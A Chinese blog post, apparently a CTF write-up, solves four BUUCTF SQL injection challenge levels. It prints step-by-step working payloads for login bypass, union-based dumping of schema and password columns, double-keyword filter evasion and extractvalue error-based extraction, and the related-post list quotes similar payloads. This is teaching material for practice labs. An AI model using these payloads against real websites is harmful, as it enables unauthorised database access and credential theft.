BUUCTF—极客大挑战sql注入题

最新推荐文章于 2024-03-31 15:21:42 发布
最新推荐文章于 2024-03-31 15:21:42 发布
阅读量882 收藏 9
点赞数 1
分类专栏: Web安全-Sql注入 Web安全-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/118972397
版权

文章目录

EasySql

尝试万能密码登录
在这里插入图片描述
flag直接显示出来了

flag{c87ced50-5e7f-405c-bbc3-044615494dac}

Love sql

依旧尝试万能密码

在这里插入图片描述
查看地址栏发现是以get方式传参,那就好办多了
在这里插入图片描述
判断列数

check.php?username=admin' order by 3%23&password=123

order by 3的时候还没报错,当为4的时候报错了,那么可以得到列数为3
下面就进行联合注入查询即可:
判断回显点
2,3均可利用

check.php?username=-1' union select 1,2,3%23&password=123

在这里插入图片描述

1、爆数据库

check.php?username=-1' union select 1,database(),3%23&password=123

在这里插入图片描述

2、爆数据表

check.php?username=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='geek'%23&password=123

爆出了geekuser和l0ve1ysq1这两张表
在这里插入图片描述

3、爆列名

盲猜我们要的flag在geekuser这张表中

check.php?username=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'%23&password=123

在这里插入图片描述

3、爆值

check.php?username=-1' union select 1,group_concat(password),3 from l0ve1ysq1%23&password=admin

在这里插入图片描述

BabySQL

在这里插入图片描述
根据提示,肯定过滤了一些字符,测试:
在这里插入图片描述
select、or、where、空格、and、union、from等都被过滤了

尝试双写绕过

判断列数

check.php?username=-1' ununionion selselectect 1,2,3%23&password=admin

在这里插入图片描述

1、爆数据库

check.php?username=1' ununionion selselectect 1,database(),3%23&password=admin
在这里插入图片描述

2、爆表名

check.php?username=1' ununionion selselectect 1,group_concat(table_name),3 frofromm information_schema.tables whwhereere table_schema='geek'%23&password=admin

在这里插入图片描述

报错了,报错信息显示information中的or没有显示,我突然想起来or也被过滤了,也双写以下就行了
在这里插入图片描述

3、爆列名

check.php?username=1' ununionion selselectect 1,group_concat(column_name),3 frofromm infoorrmation_schema.columns whwhereere table_name='b4bsql'%23&password=admin

在这里插入图片描述

4、爆值

check.php?username=1' ununionion selselectect 1,group_concat(passwoorrd),3 frofromm b4bsql%23&password=123456

在这里插入图片描述

hard sql

先fuzz测试一下

在这里插入图片描述
空格,union,and,=,/**/,+,等等都被过滤了
显然联合查询注入不能用了,报错注入的函数没被过滤,我们试一下

1、爆数据库

空格我们用()包裹

'or(extractvalue(1,concat(0x7e,database(),0x7e)))#

在这里插入图片描述

2、爆表名

= 我们用like绕过

'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')))))#

在这里插入图片描述

3、爆列名

'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’)))))#
在这里插入图片描述

4、爆值

'or(extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)))))#

在这里插入图片描述
79a8e7c9-cb72-406b-8561-dc
只显示了一部分,我们把右边的flag也爆出来

'or(extractvalue(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)))))#

在这里插入图片描述

flag{cceadf67-c8fe-41b9-8e3f-ead6beb68b4c}

Stray.io
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BUUCTF[Web 1](SQL注入1)
夜思红尘的博客
06-22 342
这里是关于网络安全之SQL注入的练习,这里SQL是一个十分危险的漏洞,因此我们要注重有关于SQL注入的防御,同时欢迎大家前来阅读!
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5453
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
buuctf sql注入
Rayae的博客
05-15 543
【强网杯】随便注 首先检查注入类型:字符注入 1' or 1=1 # 检查字段数 1' order by 2 # 1' order by 3 # # error 1054 : Unknown column '3' in 'order clause' # 报错,说明只有2个字段 查看数据库 1' union select 1, database() # 说明过滤了select、update等语句,试试堆叠注入: 1';show da...
BUUCTF web SQL注入
m0_55854679的博客
08-09 2892
文章目录[极客挑战 2019]EasySQL[强网杯 2019]随便注[SUCTF 2019]EasySQL[极客挑战 2019]LoveSQL[极客挑战 2019]BabySQL [极客挑战 2019]EasySQL 根据目,可以使用万能密码来尝试登陆。 [强网杯 2019]随便注 根据目,可以想到此目为sql注入,提交1与1’的结果如下 说明闭合方式为1’ 使用1‘ order by 查询字段数,得出为两列 1'; show tables;# 0'; show
菜鸡摸鱼BUUCTF-SQL注入1
weixin_45734980的博客
04-06 299
菜鸡摸鱼BUUCTF[极客挑战 2019]EasySQL第一步:玩玩第二步:用户名注入第三步:密码注入测试第四步:注入 [极客挑战 2019]EasySQLSQL注入最基础的目。但是要求用户名和密码全部注入否则会报错。 第一步:玩玩 测试注入一:没注入 测试一结果:wrong 第二步:用户名注入 其实一般来讲只注入用户名就能直接过了 测试二:只注入用户名 测试二结果:密码附近有错误 返回数据说明哪里有错误,说明此处有SQL注入漏洞 第三步:密码注入测试 测试三:只注入密码 测试三
BUUCTF-EasySQL(sql注入目)
m0_74167420的博客
03-10 491
为注释符,因而传入后台的是 select * from table_name where username='1' or 1=1 (因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag),则可返回真值。4、在该目中,如果不匹配数据库也能返回真值那么就能绕过验证登录(万能用户名)。一般的,库验证登录注册查询数据会用到以下的句型,如果用户与密码匹配正确则返回。因为1=1恒为真,所以SQL语句返回真值,成功绕过验证得到flag。1、万能用户名/密码。2、在该目中使用,
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 531
前言 本知识点:SQL注入 WP (这居然是个连续剧。。。 ) 首先尝试使用上一的解法绕过看看(上一 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
BUUCTF Web[极客挑战2019] EasySQL
qq_36348811的博客
03-28 327
分析 目类型是Web类型,而且是一个登录页面,首先考虑是否是SQL注入。 先尝试闭合方式,输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合。 根据报错信息,尝试注入,在此之前了解一下万能用户名和万能密码。 补充知识 所谓的万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站,所以称之为万能。 最常用的管理员用户名:admin root user test guest select * from table_na
BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 241
打开目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
BUUCTF)BUU SQL COURSE 1
weixin_63442046的博客
04-28 1980
关于BUU SQL COURSE 1的思路
BuuCTF 极客挑战SQL注入 WriteUP
她叫常玉莹
07-10 466
极客挑战EasySQL极客挑战 lovesql极客挑战 babysql极客挑战HardSQL极客挑战FinalSQL 极客挑战EasySQL 直接万能密码 1‘ or 1=1 #得到flag 极客挑战 lovesql 报错注入获取数据库名 geek ' or extractvalue(1,concat('~',database())) # 获取表名 geekuser l0ve1ysql1 ' and extractvalue(1,concat(0x7e, (select group_c.
buuctf5(sql注入篇)
weixin_63231007的博客
05-10 4113
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入目,来巩固联系一下自己在sql注入方面的知识。 [极客挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
buuctf 极客挑战sql
最新发布
l181954187的博客
03-31 260
所以要使用单引号字符型万能密码1' or 1=1 # 密码随便,#号是注释符会把密码注释掉,然后1=1恒为真所以就可以绕过得到flag。3.然后尝试使用万能账号,因为知道SQL语句闭合方式是单引号。进行SQL注入(万能密码/Hackbar)报错了,可知SQL语句闭合方式是单引号。便可以知道这个页面跟数据库发生了交互。则可知SQL语句闭合方式不是双引号。然后账号输1’,密码输123发现。先找到页面中有数据交互的地方。判断SQL语句的闭合方式。
BUUCTF [第一章 web入门]SQL注入-1
m0_49025459的博客
04-08 4937
目 先找注入点,看一url 发现了 ?id=1测试一下是字符型注入还是数字型注入 分别对url进行如下修改,发现页面没有变化,证明不是字符型注入 id=1 and 1 = 1--+ id=1 and 1 = 2--+ 分别对url进行如下修改 id=1' and 1 = 1--+ id=1' and 1 = 2--+ 在更改url为第二个的时候,发现页面出现错误,证明存在字符型注入点 判断字符段的数量 id=1' order by 3 --+ id=1' order ...
BUUCTF&&SQL注入(部分)
huohaowen的博客
01-30 1341
今天不被靶场打,被ctf虐😓😓😓
BUUCTF SQL注入大合集
fly夏天的博客
06-02 2765
SQL水平太菜了,因此专门复现一轮SQL注入再学习一下。 1.强网杯2019随便注 尝试 1 'and '1'='1 成功回显,存在注入点。 但是目有很强的过滤。 考虑堆叠注入。 由于没有过滤show函数因此可以用其来进行查询一些数据库信息。常见的有 show databases //查询数据库名称 show tables / show tables from db_name //查询(指定数据库)表名 show engines...
BUUCTF【Web】随便注(SQL注入
qq_70434663的博客
03-02 559
但是因为表过滤了select,所以使用rename先把words表改为其它的表名,在把1919810931114514表改为words表,给新的words表添加新的列名id,最后将flag改名为data。猜测是SQL注入,我们随便输入1'(单引号为英文状态下输入)发现报错提示表明此为单引号的SQL注入。第一步,测试注入点(利用引号,and 1=1 ,or 1=1之类的判断是字符型还是数字型)我们发现在1919810931114514表里面爆出了flag字段,猜测flag就在里面。接下来,爆出两张表的内容。
buuctf-颜值成绩查询(sql注入)
m0_62094846的博客
05-15 565
输入1-4都是可以的,从5开始就不存在了 多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了 但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists 尝试一下异或注入 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 这是正确的结果 错误的结果是这样的 通过这个可以最终得到flag 别人...
buuctf8 (ssti注入&nmap- oG指令&别样的sql注入)
weixin_63231007的博客
10-15 1047
get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。5.__get()中的p赋值为Modifier类,那么相当于Modifier类被当作函数处理,所以会触发Modifier类中的__invoke()魔术方法。继续看一下getSign函数。这样的语法构造还包括:echo,print,unset(),isset(),empty(),include,require,...
buuctf 极客挑战2019php
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难。这些问可能涉及到序列化、反序列化、变量值的...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值